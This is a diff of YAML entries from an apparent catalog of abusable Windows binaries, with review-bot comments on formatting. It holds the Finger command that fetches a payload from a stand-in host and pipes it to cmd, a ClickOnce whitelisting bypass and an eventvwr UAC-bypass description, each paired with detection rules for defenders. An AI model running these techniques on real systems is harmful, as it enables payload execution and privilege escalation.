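Review bot: This hunk keeps an empty `Code_Sample:` / `- Code:` pair in `Control.yml` (re-indented rather than removed), while the Atbroker.yml, Cmd.yml, Cmdkey.yml and Cmstp.yml hunks in this same commit delete the identical empty pair; the same leftover is retained in the Csc.yml, Cscript.yml, Dfsvc.yml, Diskshadow.yml, Dnscmd.yml and Esentutl.yml hunks. A bare `- Code:` loads as a null entry, and the new `YML-Schema.yml` types `Code` as `str` without `required`, so whether these files pass the schema step depends on how pykwalify treats null for an optional `str`; removing the empty block here, as the other files do, avoids depending on that.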
@@ -22,16 +22,15 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml - - IOC: Csc.exe should normally not run as System account unless it is used for development. + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_csc_folder.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml + - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_execution_msbuild_started_unusal_process.toml + - IOC: Csc.exe should normally not run as System account unless it is used for development. Resources: - Link: https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe Acknowledgement: - Person: Handle: ---- diff --git a/yml/OSBinaries/Cscript.yml b/yml/OSBinaries/Cscript.yml index 7a09cee..3a7bbab 100644 --- a/yml/OSBinaries/Cscript.yml +++ b/yml/OSBinaries/Cscript.yml 
@@ -15,22 +15,21 @@ Full_Path: - Path: C:\Windows\System32\cscript.exe - Path: C:\Windows\SysWOW64\cscript.exe Code_Sample: - - Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml - - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml - - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml - - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml - - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - - IOC: Cscript.exe executing files from alternate data streams - - IOC: DotNet CLR libraries loaded into cscript.exe - - IOC: DotNet CLR Usage Log - cscript.exe.log + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml + - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml + - Elastic: 
https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml + - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml + - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml + - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules + - IOC: Cscript.exe executing files from alternate data streams + - IOC: DotNet CLR libraries loaded into cscript.exe + - IOC: DotNet CLR Usage Log - cscript.exe.log Resources: - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/DataSvcUtil.yml b/yml/OSBinaries/DataSvcUtil.yml index e5d5c20..d4a7935 100644 --- a/yml/OSBinaries/DataSvcUtil.yml +++ b/yml/OSBinaries/DataSvcUtil.yml @@ -27,4 +27,3 @@ Resources: Acknowledgement: - Person: Ialle Teixeira Handle: '@NtSetDefault' ---- diff --git a/yml/OSBinaries/Desktopimgdownldr.yml b/yml/OSBinaries/Desktopimgdownldr.yml index 46fc551..439948a 100644 --- a/yml/OSBinaries/Desktopimgdownldr.yml +++ b/yml/OSBinaries/Desktopimgdownldr.yml @@ -26,4 +26,3 @@ Resources: Acknowledgement: - Person: Gal Kristal Handle: '@gal_kristal' ---- diff --git a/yml/OSBinaries/Dfsvc.yml b/yml/OSBinaries/Dfsvc.yml index 075e45a..28f21cf 100644 --- a/yml/OSBinaries/Dfsvc.yml +++ b/yml/OSBinaries/Dfsvc.yml 
@@ -7,7 +7,7 @@ Commands: - Command: rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo Description: Executes click-once-application from Url (trampoline for Dfsvc.exe, DotNet ClickOnce host) Usecase: Use binary to bypass Application whitelisting - Category: AWL bypass + Category: AWL Bypass Privileges: User MitreID: T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -17,13 +17,12 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml Resources: - Link: https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf - Link: https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe Acknowledgement: - Person: Casey Smith Handle: '@subtee' ---- diff --git a/yml/OSBinaries/Diantz.yml b/yml/OSBinaries/Diantz.yml index ab75e5d..18d1979 100644 --- a/yml/OSBinaries/Diantz.yml +++ b/yml/OSBinaries/Diantz.yml @@ -35,4 +35,3 @@ Acknowledgement: Handle: '@tim8288' - Person: Hai Vaknin Handle: '@vakninhai' ---- diff --git a/yml/OSBinaries/Diskshadow.yml b/yml/OSBinaries/Diskshadow.yml index c9ba246..382ecf7 100644 --- a/yml/OSBinaries/Diskshadow.yml +++ b/yml/OSBinaries/Diskshadow.yml 
@@ -22,15 +22,14 @@ Full_Path: - Path: C:\Windows\System32\diskshadow.exe - Path: C:\Windows\SysWOW64\diskshadow.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml - - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml - - IOC: Child process from diskshadow.exe + - Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_diskshadow.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/b3df5bf325461df9bcfeb051895b0c8dc3258234/rules/windows/process_creation/win_shadow_copies_deletion.yml + - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml + - IOC: Child process from diskshadow.exe Resources: - Link: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/ Acknowledgement: - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Dnscmd.yml b/yml/OSBinaries/Dnscmd.yml index 64703cb..e5eea9d 100644 --- a/yml/OSBinaries/Dnscmd.yml +++ b/yml/OSBinaries/Dnscmd.yml 
@@ -15,10 +15,10 @@ Full_Path: - Path: C:\Windows\System32\Dnscmd.exe - Path: C:\Windows\SysWOW64\Dnscmd.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml - - IOC: Dnscmd.exe loading dll from UNC/arbitrary path + - Sigma: https://github.com/SigmaHQ/sigma/blob/b08b3e2b0d5111c637dbede1381b07cb79f8c2eb/rules/windows/process_creation/process_creation_dns_serverlevelplugindll.yml + - IOC: Dnscmd.exe loading dll from UNC/arbitrary path Resources: - Link: https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 - Link: https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html @@ -32,4 +32,3 @@ Acknowledgement: Handle: '@dim0x69' - Person: Nikhil SamratAshok Handle: '@nikhil_mitt' ---- diff --git a/yml/OSBinaries/Esentutl.yml b/yml/OSBinaries/Esentutl.yml index 6a3656a..21554b2 100644 --- a/yml/OSBinaries/Esentutl.yml +++ b/yml/OSBinaries/Esentutl.yml 
@@ -50,14 +50,14 @@ Full_Path: - Path: C:\Windows\System32\esentutl.exe - Path: C:\Windows\SysWOW64\esentutl.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml - - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml - - Elastic: https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/win_susp_esentutl_activity.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/bacb44ab972343358bae612e4625f8ba2e043573/rules/windows/process_creation/process_susp_esentutl_params.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_copying_sensitive_files_with_credential_data.yml + - Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/esentutl_sam_copy.yml + - Elastic: 
https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml Resources: - Link: https://twitter.com/egre55/status/985994639202283520 - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/ @@ -66,5 +66,4 @@ Acknowledgement: - Person: egre55 Handle: '@egre55' - Person: Mike Cary - Handle: 'grayfold3d' ---- + Handle: '@grayfold3d' diff --git a/yml/OSBinaries/Eventvwr.yml b/yml/OSBinaries/Eventvwr.yml index 2d5413d..d5fd50e 100644 --- a/yml/OSBinaries/Eventvwr.yml +++ b/yml/OSBinaries/Eventvwr.yml @@ -7,7 +7,7 @@ Commands: - Command: eventvwr.exe Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user. Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. - Category: UAC bypass + Category: UAC Bypass Privileges: User MitreID: T1548.002 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 @@ -31,4 +31,3 @@ Acknowledgement: Handle: '@enigma0x3' - Person: Matt Graeber Handle: '@mattifestation' ---- diff --git a/yml/OSBinaries/Expand.yml b/yml/OSBinaries/Expand.yml index 4574fe4..90e472c 100644 --- a/yml/OSBinaries/Expand.yml +++ b/yml/OSBinaries/Expand.yml 
@@ -29,10 +29,10 @@ Full_Path: - Path: C:\Windows\System32\Expand.exe - Path: C:\Windows\SysWOW64\Expand.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/b25fbbea54014565fc4551f94c97c0d7550b1c04/rules/windows/process_creation/sysmon_expand_cabinet_files.yml + - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml Resources: - Link: https://twitter.com/infosecn1nja/status/986628482858807297 - Link: https://twitter.com/Oddvarmoe/status/986709068759949319 @@ -41,4 +41,3 @@ Acknowledgement: Handle: '@infosecn1nja' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Explorer.yml b/yml/OSBinaries/Explorer.yml index b38d467..60deb15 100644 --- a/yml/OSBinaries/Explorer.yml +++ b/yml/OSBinaries/Explorer.yml @@ -37,4 +37,3 @@ Acknowledgement: Handle: '@CyberRaiju' - Person: Jimmy Handle: '@bohops' ---- diff --git a/yml/OSBinaries/Extexport.yml b/yml/OSBinaries/Extexport.yml index 0b61161..5b8080d 100644 --- a/yml/OSBinaries/Extexport.yml +++ b/yml/OSBinaries/Extexport.yml @@ -1,6 +1,6 @@ --- Name: Extexport.exe -Description: +Description: Load a DLL located in the c:\test folder with a specific name. Author: 'Oddvar Moe' Created: 2018-05-25 Commands: 
@@ -15,7 +15,7 @@ Full_Path: - Path: C:\Program Files\Internet Explorer\Extexport.exe - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe Code_Sample: - - Code: + - Code: Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extexport.yml - IOC: Extexport.exe loads dll and is execute from other folder the original path @@ -24,4 +24,3 @@ Resources: Acknowledgement: - Person: Adam Handle: '@hexacorn' ---- diff --git a/yml/OSBinaries/Extrac32.yml b/yml/OSBinaries/Extrac32.yml index 4682e7c..19ac2bf 100644 --- a/yml/OSBinaries/Extrac32.yml +++ b/yml/OSBinaries/Extrac32.yml @@ -1,6 +1,6 @@ --- Name: Extrac32.exe -Description: +Description: Extract to ADS, copy or overwrite a file with Extrac32.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: 
@@ -38,9 +38,9 @@ Full_Path: Code_Sample: - Code: Detection: - - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml - - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml + - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml + - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/0f33cbc85bf4b23b8d8308bfcc8b21a9e5431ee7/rules/windows/process_creation/win_pc_lolbas_extrac32_ads.yml Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -54,4 +54,3 @@ Acknowledgement: Handle: '@VakninHai' - Person: Tamir Yehuda Handle: '@tim8288' ---- diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 22fcbb0..3700472 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml @@ -1,6 +1,6 @@ --- Name: Findstr.exe -Description: +Description: Write to ADS, discover, or download files with Findstr.exe Author: 'Oddvar Moe' Created: 2018-05-25 Commands: 
@@ -36,13 +36,12 @@ Full_Path: - Path: C:\Windows\System32\findstr.exe - Path: C:\Windows\SysWOW64\findstr.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_findstr.yml Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Finger.yml b/yml/OSBinaries/Finger.yml index e84d9d9..936098f 100644 --- a/yml/OSBinaries/Finger.yml +++ b/yml/OSBinaries/Finger.yml 
@@ -1,31 +1,30 @@
----
-Name: Finger.exe
-Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
-Author: Ruben Revuelta
-Created: 2021-08-30
-Commands:
- - Command: finger user@example.host.com | more +2 | cmd
- Description: 'Downloads payload from remote Finger server. This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
- Usecase: Download malicious payload
- Category: Download
- Privileges: User
- MitreID: T1105
- OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
-Full_Path:
- - Path: c:\windows\system32\finger.exe
- - Path: c:\windows\syswow64\finger.exe
-Detection:
- - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
- - IOC: finger.exe should not be run on a normal workstation.
- - IOC: finger.exe connecting to external resources.
-Resources:
- - Link: https://twitter.com/DissectMalware/status/997340270273409024
- - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
-Acknowledgement:
- - Person: Ruben Revuelta (MAPFRE CERT)
- Handle: '@rubn_RB'
- - Person: Jose A. Jimenez (MAPFRE CERT)
- Handle: '@Ocelotty6669'
- - Person: Malwrologist
- Handle: '@DissectMalware'
----
+---
+Name: Finger.exe
+Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
+Author: Ruben Revuelta
+Created: 2021-08-30
+Commands:
+ - Command: finger user@example.host.com | more +2 | cmd
+ Description: 'Downloads payload from remote Finger server.
This example connects to "example.host.com" asking for user "user"; the result could contain malicious shellcode which is executed by the cmd process.'
+ Usecase: Download malicious payload
+ Category: Download
+ Privileges: User
+ MitreID: T1105
+ OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
+Full_Path:
+ - Path: c:\windows\system32\finger.exe
+ - Path: c:\windows\syswow64\finger.exe
+Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_finger_usage.yml
+ - IOC: finger.exe should not be run on a normal workstation.
+ - IOC: finger.exe connecting to external resources.
+Resources:
+ - Link: https://twitter.com/DissectMalware/status/997340270273409024
+ - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
+Acknowledgement:
+ - Person: Ruben Revuelta (MAPFRE CERT)
+ Handle: '@rubn_RB'
+ - Person: Jose A. Jimenez (MAPFRE CERT)
+ Handle: '@Ocelotty6669'
+ - Person: Malwrologist
+ Handle: '@DissectMalware'
diff --git a/yml/OSBinaries/FltMC.yml b/yml/OSBinaries/FltMC.yml
index 8717c5b..bcc8caf 100644
--- a/yml/OSBinaries/FltMC.yml
+++ b/yml/OSBinaries/FltMC.yml
@@ -25,4 +25,3 @@ Resources:
Acknowledgement:
- Person: Carlos Perez
Handle: '@Carlos_Perez'
----
diff --git a/yml/OSBinaries/Forfiles.yml b/yml/OSBinaries/Forfiles.yml
index b8761ad..f9778ea 100644
--- a/yml/OSBinaries/Forfiles.yml
+++ b/yml/OSBinaries/Forfiles.yml
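Review bot: The Finger.yml hunk removes and re-adds all 30 content lines with text that is identical on both sides, so the only real change visible here is the dropped trailing `---`; the rest is presumably a line-ending (CRLF→LF) or BOM normalization that this view cannot show, which hides the substantive edit behind a whole-file diff. Pinning the encoding repository-wide would stop this recurring: add a `.gitattributes` with `*.yml text eol=lf` so Git normalizes on check-in and future reviews of these entries show only the lines that changed. If the rewrite was instead intentional (for example re-indenting the `Commands` block), a sentence in the commit message saying so would help reviewers of the other 40-odd files touched here.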
@@ -22,9 +22,9 @@ Full_Path: - Path: C:\Windows\System32\forfiles.exe - Path: C:\Windows\SysWOW64\forfiles.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml + - Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_indirect_cmd.yml Resources: - Link: https://twitter.com/vector_sec/status/896049052642533376 - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f @@ -34,4 +34,3 @@ Acknowledgement: Handle: '@vector_sec' - Person: Oddvar Moe Handle: '@oddvarmoe' ---- diff --git a/yml/OSBinaries/Ftp.yml b/yml/OSBinaries/Ftp.yml index c41136e..6293171 100644 --- a/yml/OSBinaries/Ftp.yml +++ b/yml/OSBinaries/Ftp.yml @@ -22,10 +22,10 @@ Full_Path: - Path: C:\Windows\System32\ftp.exe - Path: C:\Windows\SysWOW64\ftp.exe Code_Sample: -- Code: + - Code: Detection: - - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml - - IOC: cmd /c as child process of ftp.exe + - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ftp.yml + - IOC: cmd /c as child process of ftp.exe Resources: - Link: https://twitter.com/0xAmit/status/1070063130636640256 - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939 @@ -37,5 +37,4 @@ Acknowledgement: - Person: BennyHusted Handle: '' - Person: Amit Serper - Handle: '@0xAmit ' ---- + Handle: '@0xAmit' diff --git a/yml/OSBinaries/GfxDownloadWrapper.yml b/yml/OSBinaries/GfxDownloadWrapper.yml index bd3ec8f..9675000 100644 --- a/yml/OSBinaries/GfxDownloadWrapper.yml +++ b/yml/OSBinaries/GfxDownloadWrapper.yml @@ -176,4 +176,3 @@ Resources: Acknowledgement: - Person: Jesus Galvez Handle: ---- 
diff --git a/yml/OSBinaries/Gpscript.yml b/yml/OSBinaries/Gpscript.yml
index 22ecd6a..ef8076e 100644
--- a/yml/OSBinaries/Gpscript.yml
+++ b/yml/OSBinaries/Gpscript.yml
@@ -32,4 +32,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/Hh.yml b/yml/OSBinaries/Hh.yml
index ad15db6..bbf28b8 100644
--- a/yml/OSBinaries/Hh.yml
+++ b/yml/OSBinaries/Hh.yml
@@ -35,4 +35,3 @@ Resources:
Acknowledgement:
- Person: Oddvar Moe
Handle: '@oddvarmoe'
----
diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml
index 2199ed5..806f00b 100644
--- a/yml/OSBinaries/IMEWDBLD.yml
+++ b/yml/OSBinaries/IMEWDBLD.yml
@@ -20,4 +20,3 @@ Resources:
Acknowledgement:
- Person: Wade Hickey
Handle: '@notwhickey'
----
diff --git a/yml/OSBinaries/Ie4uinit.yml b/yml/OSBinaries/Ie4uinit.yml
index f5a9e3d..8fbbcc4 100644
--- a/yml/OSBinaries/Ie4uinit.yml
+++ b/yml/OSBinaries/Ie4uinit.yml
@@ -1,6 +1,6 @@
---
Name: Ie4uinit.exe
-Description:
+Description: Executes commands from a specially prepared ie4uinit.inf file.
Author: 'Oddvar Moe'
Created: 2018-05-25
Commands:
@@ -27,4 +27,3 @@ Resources:
Acknowledgement:
- Person: Jimmy
Handle: '@bohops'
----
diff --git a/yml/OSBinaries/Ieexec.yml b/yml/OSBinaries/Ieexec.yml
index aa591b1..c14b4a3 100644
--- a/yml/OSBinaries/Ieexec.yml
+++ b/yml/OSBinaries/Ieexec.yml
@@ -34,4 +34,3 @@ Resources:
Acknowledgement:
- Person: Casey Smith
Handle: '@subtee'
----
diff --git a/yml/OSBinaries/Ilasm.yml b/yml/OSBinaries/Ilasm.yml
index 98bf87c..3132856 100644
--- a/yml/OSBinaries/Ilasm.yml
+++ b/yml/OSBinaries/Ilasm.yml
@@ -17,6 +17,7 @@ Commands:
Category: Compile
Privileges: User
MitreID: T1127
+ OperatingSystem: Windows 10,7
Full_Path:
- Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
- Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
@@ -32,4 +33,3 @@ Acknowledgement:
Handle: '@VakninHai'
- Person: Lior Adar
Handle:
----
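Review bot: The `OperatingSystem: Windows 10,7` value added in the Ilasm.yml `@@ -17,6 +17,7 @@` hunk does not follow the format the other entries use, where every version is spelled out and comma-space separated (`Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10` in Dfsvc.yml above); a consumer that splits this field on `, ` would get a single token `Windows 10,7`. Prefer `OperatingSystem: Windows 7, Windows 10` so the entry lists the same way as the rest of the corpus. The `- Command:` entry this field belongs to starts above the hunk, so whether a second command in the same file also lacks `OperatingSystem` cannot be seen here.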
